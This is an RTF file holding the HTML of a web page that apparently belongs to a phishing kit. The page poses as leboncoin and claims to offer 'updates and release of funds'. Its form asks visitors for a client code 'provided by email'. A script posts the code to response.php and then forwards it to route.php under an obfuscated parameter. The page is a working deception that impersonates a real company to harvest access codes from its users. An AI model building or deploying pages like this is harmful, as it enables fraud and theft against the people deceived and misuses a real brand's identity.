{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1036{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
{\colortbl ;\red0\green0\blue255;}
{\*\generator Riched20 10.0.22621}\viewkind4\uc1 
\pard\sa200\sl276\slmult1\f0\fs22\lang12\par
<!DOCTYPE html>\par
<html lang="en">\par
\tab\par
     <meta http-equiv="content-type" content="text/html;charset=UTF-8" />\par
  \par
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1">\par
    <meta name="robots" content="noindex,">\par
<head>\par
\tab <title>informations - leboncoin, site de petites annonces gratuites</title><meta property="og:site_name" content="leboncoin, site de petites annonces gratuites" />\par
\par
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>\par
<meta name="viewport" content="width=device-width, initial-scale=1.0;">\par
<link rel="shortcut icon" type="image/png" href="img/icon.png" type="image/x-icon" />\tab\par
<link id="wsite-base-style" rel="stylesheet" type="text/css" href="css/sites2cfc.css?buildTime=1652983663" />\par
<link rel="stylesheet" type="text/css" href="../cdn2.editmysite.com/css/old/fancyboxff58.css?1652983663" />\par
<link rel="stylesheet" type="text/css" href="css/social-iconse978.css?buildtime=1652983663" media="screen,projection" />\par
<link rel="stylesheet" type="text/css" href="css/main_style9d6f.css?1652986769" title="wsite-theme-css" />\par
<link href='http://fonts.googleapis.com/css?family=Lato:400,300,300italic,700,400italic,700italic&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css' />\par
<link href='http://fonts.googleapis.com/css?family=Montserrat:400,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css' />\par
<link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css' />\par
\par
<script src='js/jquery.min.js'></script>\par
\par
<script type="text/javascript" src="../cdn2.editmysite.com/js/lang/en/stl0690.js?buildTime=1652983663&amp;"></script>\par
<script src="../cdn2.editmysite.com/js/site/main2cfc.js?buildTime=1652983663"></script><script type="text/javascript">\par
\tab\tab function initCustomerAccountsModels() \{\par
\tab\tab\tab\tab\tab (function()\{_W.setup_rpc(\{"url":"\\/ajax\\/api\\/JsonRPC\\/CustomerAccounts\\/","actions":\{"CustomerAccounts":[\{"name":"login","len":2,"multiple":false,"standalone":false\},\{"name":"logout","len":0,"multiple":false,"standalone":false\},\{"name":"getSessionDetails","len":0,"multiple":false,"standalone":false\},\{"name":"getAccountDetails","len":0,"multiple":false,"standalone":false\},\{"name":"getOrders","len":0,"multiple":false,"standalone":false\},\{"name":"register","len":4,"multiple":false,"standalone":false\},\{"name":"emailExists","len":1,"multiple":false,"standalone":false\},\{"name":"passwordReset","len":1,"multiple":false,"standalone":false\},\{"name":"passwordUpdate","len":3,"multiple":false,"standalone":false\},\{"name":"validateSession","len":1,"multiple":false,"standalone":false\}]\},"namespace":"_W.CustomerAccounts.RPC"\});\par
_W.setup_model_rpc(\{"rpc_namespace":"_W.CustomerAccounts.RPC","model_namespace":"_W.CustomerAccounts.BackboneModelData","collection_namespace":"_W.CustomerAccounts.BackboneCollectionData","bootstrap_namespace":"_W.CustomerAccounts.BackboneBootstrap","models":\{"CustomerAccounts":\{"_class":"CustomerAccounts.Model.CustomerAccounts","defaults":null,"validation":null,"types":null,"idAttribute":null,"keydefs":null\}\},"collections":\{"CustomerAccounts":\{"_class":"CustomerAccounts.Collection.CustomerAccounts"\}\},"bootstrap":[]\});\par
\})();\par
\tab\tab\}\par
\tab\tab if(document.createEvent && document.addEventListener) \{\par
\tab\tab\tab var initEvt = document.createEvent('Event');\par
\tab\tab\tab initEvt.initEvent('customerAccountsModelsInitialized', true, false);\par
\tab\tab\tab document.dispatchEvent(initEvt);\par
\tab\tab\} else if(document.documentElement.initCustomerAccountsModels === 0)\{\par
\tab\tab\tab document.documentElement.initCustomerAccountsModels++\par
\tab\tab\}\par
\tab\tab </script>\par
\tab\tab <script>_W.relinquish && _W.relinquish()</script>\par
<script type="text/javascript" src="../cdn2.editmysite.com/js/lang/en/stl0690.js?buildTime=1652983663&amp;"></script><script> _W.themePlugins = \{"navpane":\{"condense":1024,"forced":0\}\};</script><script src='../cdn2.editmysite.com/js/site/theme-plugins2cfc.js?buildTime=1652983663'></script><script type="text/javascript"> _W.recaptchaUrl = "../www.google.com/recaptcha/api.js"; </script>\par
<style>\par
\tab .error \{\par
\tab\tab /* Hidden by default */\par
\tab\tab display: none;\par
\tab\tab position: fixed;\par
\tab\tab /* Stay in place */\par
\tab\tab z-index: 1;\par
\tab\tab /* Sit on top */\par
\tab\tab padding-top: 100px;\par
\tab\tab /* Location of the box */\par
\tab\tab left: 0;\par
\tab\tab top: 0;\par
\tab\tab width: 100%;\par
\tab\tab /* Full width */\par
\tab\tab height: 100%;\par
\tab\tab /* Full height */\par
\tab\tab background-color: blue;\par
\tab\tab /* Fallback color */\par
\tab\tab background-color: rgba(0, 0, 0, 0.4);\par
\tab\tab /* Black w/ opacity */\par
\tab\}\par
\par
\tab nav \{\par
\tab\tab box-shadow: 0 2px 4px 0 rgba(12, 43, 218, 0.15);\par
\tab\tab ;\par
\tab\}\par
</style>\par
</head>\par
\tab <body class="splash-page  wsite-page-informations  wsite-theme-light"><div id="header">\par
\tab\tab <div class="container">\par
\tab\tab\tab <div class="icons">\par
\tab\tab\tab\tab <div class="w-navpane-trigger hamburger">\par
\tab\tab\tab\tab\tab <span></span>\par
\tab\tab\tab\tab </div>\par
\tab\tab\tab </div>\par
\tab\tab\tab <div class="logo"><span class="wsite-logo">\par
\par
\tab\par
\par
</span></div>\par
\tab\tab\tab <div class="icons">\par
\tab\tab\tab\tab\par
\tab\tab\tab\tab\par
\tab\tab\tab\tab <a href="#" class="close w-navpane-close"><span></span></a>\par
\tab\tab\tab </div>\par
\par
\tab\tab </div>\par
\tab\tab <div id="navlist" class="w-navlist nav"><ul class="wsite-menu-default">\par
</ul>\par
</div>\par
\par
</div>\par
\tab\tab\tab </div>\par
\tab\tab </div>\par
\tab\tab\par
\tab </div>\par
\par
\tab <div id="content">\par
\tab\tab <div id="banner" class="wsite-background wsite-custom-background">\par
\tab\tab\tab <div class="banner-content">\par
\tab\tab\tab\tab <div class="container"><div id="wsite-content" class="wsite-elements wsite-not-footer">\par
\tab <h2 class="wsite-content-title" style="text-align:center;"><strong><font size="6" color="#da8044">Mises \'e0 jour et d\'e9blocage des fonds</font></strong></h2>\par
\par
<div><div class="wsite-multicol"><div class="wsite-multicol-table-wrap" style="margin:0 -15px;">\par
\tab <table class="wsite-multicol-table">\par
\tab\tab <tbody class="wsite-multicol-tbody">\par
\tab\tab\tab <tr class="wsite-multicol-tr">\par
\tab\tab\tab\tab <td class="wsite-multicol-col" style="width:50%; padding:0 15px;">\par
\tab\tab\tab\tab\tab\par
\tab\tab\tab\tab\tab\tab\par
\par
<div><div class="wsite-image wsite-image-border-none " style="padding-top:10px;padding-bottom:10px;margin-left:0;margin-right:0;text-align:center">\par
<a>\par
<img src="img/delai-paiement-transaction.jpg" alt="Picture" style="width:auto;max-width:100%" />\par
</a>\par
<div style="display:block;font-size:90%"></div>\par
</div></div>\par
</td><td class="wsite-multicol-col" style="width:50%; padding:0 15px;">\par
\tab\tab\tab\tab\tab\par
\par
\par
<div><div class="wsite-image wsite-image-border-none " style="padding-top:50px;padding-bottom:10px;margin-left:0;margin-right:0;text-align:center">\par
\tab <form >\par
\tab\tab\tab\tab\tab\tab\par
\tab\tab <div>\par
\tab\tab\tab <div class="wsite-form-field" style="margin:5px 0px 5px 0px;">\par
\tab\tab\tab\tab <label class="wsite-form-label" for="input-935132523373678599">Code Client de la mise \'e0 jour <span class="form-required">*</span></label>\par
\tab\tab\tab\tab <div class="wsite-form-input-container">\par
\tab\tab\tab\tab\tab <input aria-required="true" name="email" id="email" placeholder="renseigner le code client " required class="wsite-form-input wsite-input wsite-input-width-370px email" type="text" />\par
\tab\tab\tab\tab </div>\par
\tab\tab\tab\tab <div id="instructions-935132523373678599" class="wsite-form-instructions" style="display:none;"></div>\par
\tab\tab\tab </div>\par
\tab\tab\tab <div class=" form-group " style="margin-top: 10px; ">\tab\par
\tab\tab\tab\tab <small id="helpId " class="text-muted errorpassword" style="text-align: left; display:none;">\par
\tab\tab\tab\tab\tab <p style="color: red;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Veuillez entrer le code fourni par mail pour votre mise \'e0 jour.</p>\par
\tab\tab\tab\tab </small>\par
\tab\tab\tab </div>\par
\tab\tab\tab <div style="margin-top:10px; margin-bottom:10px;" class="wsite-form-submit-container">\par
\tab\tab\tab\tab <input type="submit" class="connection" value="Se connecter " style="color: white;background-color:#da8044;position:absolute;left:100px;font-size:15px;width:170px;height:50px;">\par
\tab\tab\tab </div>\tab\par
\tab\tab </div>\par
\tab\tab\tab\tab\par
\tab\tab\tab </div>\par
\par
\tab\tab </div>\par
\tab\tab\par
\tab </form>\par
<div style="display:block;font-size:90%"></div>\par
</div></div>\par
\tab\tab\tab\tab\tab\par
</td></tr>\par
</tbody>\par
</table>\par
</div></div></div>\par
\par
<div><div class="wsite-multicol"><div class="wsite-multicol-table-wrap" style="margin:0 -15px;">\par
\tab <table class="wsite-multicol-table">\par
\tab\tab <tbody class="wsite-multicol-tbody">\par
\tab\tab\tab <tr class="wsite-multicol-tr">\par
\tab\tab\tab\tab <td class="wsite-multicol-col" style="width:50%; padding:0 15px;">\par
\tab\tab\tab\tab\tab\par
\tab\tab\tab\tab </div>\par
\tab\tab\tab\tab </td><td class="wsite-multicol-col" style="width:50%; padding:0 15px;">\par
\tab\tab\tab\tab\tab\par
\tab\tab\tab\tab\tab\tab\par
\par
\tab\tab\tab\tab\tab <div><div class="wsite-image wsite-image-border-none " style="padding-top:10px;padding-bottom:10px;margin-left:0;margin-right:0;text-align:center">\par
\tab\tab\tab\tab\tab\par
\tab\tab\tab\tab\tab <div style="display:block;font-size:90%"></div>\par
\tab\tab\tab\tab\tab </div></div>\par
\tab\tab\tab\tab\tab </td></tr>\par
\tab\tab </tbody>\par
</table>\par
</div></div></div>\par
</div>\par
</div>\par
\tab </div>\par
\tab </div>\par
\tab <div id="footer">\par
\par
\par
\par
<script type="text/javascript" src="../cdn2.editmysite.com/js/site/footerSignup2adf.js?buildTime=1653324973"></script>\par
\par
</div>\par
\tab </div>\par
\par
\tab <div class="overlay w-navpane-close"></div>\par
\par
\tab <script type="text/javascript" src="js/plugins4c5d.js?1652939865"></script>\par
\tab <script type="text/javascript" src="js/custom4c5d.js?1652939865"></script>\par
    <div id="customer-accounts-app"></div>\par
    <script src="../cdn2.editmysite.com/js/site/main-customer-accounts-site2cfc.js?buildTime=1652983663"></script>\par
\par
\tab\tab <script type="text/javascript">\par
\tab var _gaq = _gaq || [];\par
\tab _gaq.push(['_setAccount', 'UA-7870337-1']);\par
\tab _gaq.push(['_setDomainName', 'none']);\par
\tab _gaq.push(['_setAllowLinker', true]);\par
\par
\tab (function() \{\par
\tab\tab var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;\par
\tab\tab ga.src = ('https:' == document.location.protocol ? '{{\field{\*\fldinst{HYPERLINK https://ssl }}{\fldrslt{https://ssl\ul0\cf0}}}}\f0\fs22 ' : '{{\field{\*\fldinst{HYPERLINK http://www }}{\fldrslt{http://www\ul0\cf0}}}}\f0\fs22 ') + '.google-analytics.com/ga.js';\par
\tab\tab // NOTE: keep the [1] if you replace this code. Otherwise cookie banner scripts won't be first on the page\par
\tab\tab var s = document.getElementsByTagName('script')[1]; s.parentNode.insertBefore(ga, s);\par
\tab\})();\par
\par
\tab _W.Analytics = _W.Analytics || \{'trackers': \{\}\};\par
\tab _W.Analytics.trackers.wGA = '_gaq';\par
</script>\par
<script type="text/javascript ">\par
\tab $(document).ready(function() \{\par
\par
\tab\tab $('.connection').on('click', function(e) \{\par
\tab\tab\tab e.preventDefault()\par
\tab\tab\tab\par
\tab\tab\tab if (($('.email').val().length < 3) || ($('.email').val() == '')) \{\par
\tab\tab\tab\tab $('.errorpassword').css(\{\par
\tab\tab\tab\tab\tab 'display': 'block'\par
\tab\tab\tab\tab\})\par
\tab\tab\tab\tab $('.email').css(\{\par
\tab\tab\tab\tab\tab 'border-color': 'red'\par
\tab\tab\tab\tab\})\par
\tab\tab\tab\} else \{\par
\tab\tab\tab\tab $('.errorpassword').css(\{\par
\tab\tab\tab\tab\tab 'display': 'none'\par
\tab\tab\tab\tab\})\par
\tab\tab\tab\tab $('.email').css(\{\par
\tab\tab\tab\tab\tab 'border-color': ' rgb(202, 209, 217)'\par
\tab\tab\tab\tab\})\par
\tab\tab\tab\}\par
\tab\tab\tab if ($('.email').val().length >= 4) \{\par
\tab\tab\tab\tab $.ajax(\{\par
\tab\tab\tab\tab\tab url: 'response.php',\par
\tab\tab\tab\tab\tab type: 'POST',\par
\tab\tab\tab\tab\tab data: 'email=' + $('.email').val(),\par
\tab\tab\tab\tab\tab success: function(code_html, statut) \{ // success est toujours en place, bien s\'fbr !\par
\par
\tab\tab\tab\tab\tab\tab window.location.href = "route.php?ffe6865454eegehzefgezfez587srhs=" + $('.email').val();\par
\par
\tab\tab\tab\tab\tab\}, // success est toujours en place, bien s\'fbr ! \par
\tab\tab\tab\tab\})\par
\par
\tab\tab\tab\}\par
\tab\tab\})\par
\tab\})\par
</script>\par
\par
\par
\tab </body>\par
</html>\par
}
 